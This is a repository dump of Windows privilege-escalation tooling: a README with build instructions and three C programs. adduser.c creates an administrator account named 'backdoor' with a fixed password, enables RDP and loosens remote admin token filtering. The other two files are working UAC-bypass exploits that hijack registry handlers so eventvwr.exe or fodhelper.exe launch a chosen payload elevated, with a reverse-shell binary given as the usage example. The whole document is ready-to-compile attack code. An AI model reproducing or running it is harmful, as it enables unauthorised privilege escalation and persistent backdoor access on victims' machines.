├── README.md ├── adduser.c ├── eventvwr-bypass.c └── fodhelper-bypass.c /README.md: -------------------------------------------------------------------------------- 1 | # Compilitaion instructions: 2 | 3 | ## fodhelper works for both x86 and x64 4 | 5 | ### x86 6 | i686-w64-mingw32-gcc fodhelper-bypass.c -o fodhelper-bypass-x86.exe 7 | 8 | ### x64 9 | x86_64-w64-mingw32-gcc fodhelper-bypass.c -o fodhelper-bypassuac-x64.exe 10 | 11 | ## EventVwr works only for x64 12 | 13 | ### x64 14 | x86_64-w64-mingw32-gcc eventvwr-bypass.c -o eventvwr-bypass-x64.exe 15 | 16 | 17 | 18 | 19 | ## Execution 20 | fodhelper-bypass-x86.exe 21 | 22 | eventvwr-bypass-x64.exe 23 | -------------------------------------------------------------------------------- /adduser.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | 6 | 7 | int main(int argc, char *argv[]) 8 | { 9 | printf("Creating user new user\n"); 10 | system("net.exe user backdoor Password123! /add"); 11 | 12 | printf("Adding user to Administrators group\n"); 13 | system("net.exe localgroup Administrators backdoor /add"); 14 | 15 | printf("Enabling RDP\n"); 16 | system("reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f"); 17 | 18 | printf("Allowing Admins access by setting LocalAccountTokenFilterPolicy to 1\n"); 19 | system("reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1"); 20 | 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /eventvwr-bypass.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | /* 6 | * Pretty standard code to recursively nuke a Reg Key 7 | */ 8 | 9 | int RegDelnodeRecurse (LPTSTR lpSubKey) { 10 | LPTSTR lpEnd; 11 | LONG lResult; 12 | DWORD dwSize = MAX_PATH; 13 | TCHAR szName[MAX_PATH]; 14 | HKEY hKey; 15 | FILETIME ftWrite; 16 | 17 | lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey); 18 | 19 | if (lResult == ERROR_SUCCESS) return 1; 20 | 21 | lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey); 22 | 23 | if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND; 24 | 25 | lpEnd = lpSubKey + lstrlen(lpSubKey); 26 | *lpEnd++ = '\\'; 27 | *lpEnd = '\0'; 28 | 29 | if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) { 30 | do { 31 | strcpy(lpEnd, szName); 32 | if (!RegDelnodeRecurse(lpSubKey)) break; 33 | lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite); 34 | } while (lResult == ERROR_SUCCESS); 35 | } 36 | 37 | lpEnd--; 38 | *lpEnd = TEXT('\0'); 39 | 40 | RegCloseKey(hKey); 41 | 42 | return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS; 43 | } 44 | 45 | /* 46 | * Wrapper for above 47 | */ 48 | 49 | int RegDelnode() { 50 | TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\mscfile"; 51 | return RegDelnodeRecurse(szDelKey); 52 | } 53 | 54 | void __c_exploitUAC(const char* binary) { 55 | char curPath[MAX_PATH], evtVwr[MAX_PATH]; 56 | HKEY attackKey; 57 | SHELLEXECUTEINFO exInfo; 58 | 59 | /* 60 | curPath is the command you want to elevate. 61 | Below is an example that shows how to elevate 62 | foobar.exe sitting in the same path as this 63 | program. 64 | */ 65 | 66 | /* 67 | GetCurrentDirectory(MAX_PATH, curPath); 68 | strcat(curPath, "\\foobar.exe"); 69 | */ 70 | 71 | GetCurrentDirectory(MAX_PATH, curPath); 72 | strcat(curPath, "\\"); 73 | strcat(curPath, binary); 74 | 75 | 76 | sprintf(evtVwr, "%s\\System32\\eventvwr.exe", getenv("SYSTEMROOT")); 77 | 78 | if(!RegDelnode()) return; 79 | if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\mscfile\\shell\\open\\command", &attackKey)!=ERROR_SUCCESS) return; 80 | 81 | RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath)); 82 | 83 | exInfo.lpVerb = "open"; 84 | exInfo.lpFile = evtVwr; 85 | exInfo.nShow = 0; 86 | exInfo.fMask = SEE_MASK_NOCLOSEPROCESS; 87 | exInfo.cbSize = sizeof(SHELLEXECUTEINFO); 88 | exInfo.hwnd = 0; 89 | exInfo.lpParameters = 0; 90 | exInfo.lpDirectory = 0; 91 | exInfo.hInstApp = 0; 92 | 93 | ShellExecuteEx(&exInfo); 94 | 95 | Sleep(5000); 96 | 97 | TerminateProcess(exInfo.hProcess, 0); 98 | 99 | RegCloseKey(attackKey); 100 | RegDelnode(); 101 | } 102 | 103 | int main(int argc, char *argv[]) 104 | { 105 | if (argc != 2) 106 | { 107 | printf("Usage:\n"); 108 | printf("\teventvwr-bypassuac-64.exe \n\n"); 109 | printf("\tExample: eventvwr-bypassuac-64.exe rev443.exe\n"); 110 | } 111 | 112 | __c_exploitUAC(argv[1]); 113 | return 0; 114 | } 115 | -------------------------------------------------------------------------------- /fodhelper-bypass.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | /* 6 | * Pretty standard code to recursively nuke a Reg Key 7 | */ 8 | 9 | int RegDelnodeRecurse (LPTSTR lpSubKey) { 10 | LPTSTR lpEnd; 11 | LONG lResult; 12 | DWORD dwSize = MAX_PATH; 13 | TCHAR szName[MAX_PATH]; 14 | HKEY hKey; 15 | FILETIME ftWrite; 16 | 17 | lResult = RegDeleteKey(HKEY_CURRENT_USER, lpSubKey); 18 | 19 | if (lResult == ERROR_SUCCESS) return 1; 20 | 21 | lResult = RegOpenKeyEx(HKEY_CURRENT_USER, lpSubKey, 0, KEY_READ, &hKey); 22 | 23 | if (lResult != ERROR_SUCCESS) return lResult == ERROR_FILE_NOT_FOUND; 24 | 25 | lpEnd = lpSubKey + lstrlen(lpSubKey); 26 | *lpEnd++ = '\\'; 27 | *lpEnd = '\0'; 28 | 29 | if (RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite) == ERROR_SUCCESS) { 30 | do { 31 | strcpy(lpEnd, szName); 32 | if (!RegDelnodeRecurse(lpSubKey)) break; 33 | lResult = RegEnumKeyEx(hKey, 0, szName, &dwSize, 0, 0, 0, &ftWrite); 34 | } while (lResult == ERROR_SUCCESS); 35 | } 36 | 37 | lpEnd--; 38 | *lpEnd = TEXT('\0'); 39 | 40 | RegCloseKey(hKey); 41 | 42 | return RegDeleteKey(HKEY_CURRENT_USER, lpSubKey) == ERROR_SUCCESS; 43 | } 44 | 45 | /* 46 | * Wrapper for above 47 | */ 48 | 49 | int RegDelnode() { 50 | TCHAR szDelKey[MAX_PATH*2] = "Software\\Classes\\ms-settings"; 51 | return RegDelnodeRecurse(szDelKey); 52 | } 53 | 54 | void __c_exploitUAC(const char* binary) { 55 | char curPath[MAX_PATH], fodHelper[MAX_PATH]; 56 | HKEY attackKey; 57 | SHELLEXECUTEINFO exInfo; 58 | 59 | /* 60 | curPath is the command you want to elevate. 61 | Below is an example that shows how to elevate 62 | foobar.exe sitting in the same path as this 63 | program. 64 | */ 65 | 66 | /* 67 | GetCurrentDirectory(MAX_PATH, curPath); 68 | strcat(curPath, "\\foobar.exe"); 69 | */ 70 | 71 | GetCurrentDirectory(MAX_PATH, curPath); 72 | strcat(curPath, "\\"); 73 | strcat(curPath, binary); 74 | 75 | 76 | sprintf(fodHelper, "%s\\System32\\fodhelper.exe", getenv("SYSTEMROOT")); 77 | 78 | if(!RegDelnode()) return; 79 | if(RegCreateKey(HKEY_CURRENT_USER, "Software\\Classes\\ms-settings\\Shell\\Open\\command", &attackKey)!=ERROR_SUCCESS) return; 80 | 81 | RegSetValueEx(attackKey, "", 0, REG_SZ, curPath, strlen(curPath)); 82 | RegSetValueEx(attackKey, "DelegateExecute", 0, REG_SZ, "", strlen("")); 83 | 84 | exInfo.lpVerb = "open"; 85 | exInfo.lpFile = fodHelper; 86 | exInfo.nShow = 0; 87 | exInfo.fMask = SEE_MASK_NOCLOSEPROCESS; 88 | exInfo.cbSize = sizeof(SHELLEXECUTEINFO); 89 | exInfo.hwnd = 0; 90 | exInfo.lpParameters = 0; 91 | exInfo.lpDirectory = 0; 92 | exInfo.hInstApp = 0; 93 | 94 | ShellExecuteEx(&exInfo); 95 | 96 | Sleep(5000); 97 | 98 | TerminateProcess(exInfo.hProcess, 0); 99 | 100 | RegCloseKey(attackKey); 101 | RegDelnode(); 102 | } 103 | 104 | int main(int argc, char *argv[]) 105 | { 106 | if (argc != 2) 107 | { 108 | printf("Usage:\n"); 109 | printf("\tfoodhelper-bypassuac-64.exe \n\n"); 110 | printf("\tExample: fodhelper-bypassuac-64.exe rev443.exe\n"); 111 | } 112 | 113 | __c_exploitUAC(argv[1]); 114 | return 0; 115 | } 116 | --------------------------------------------------------------------------------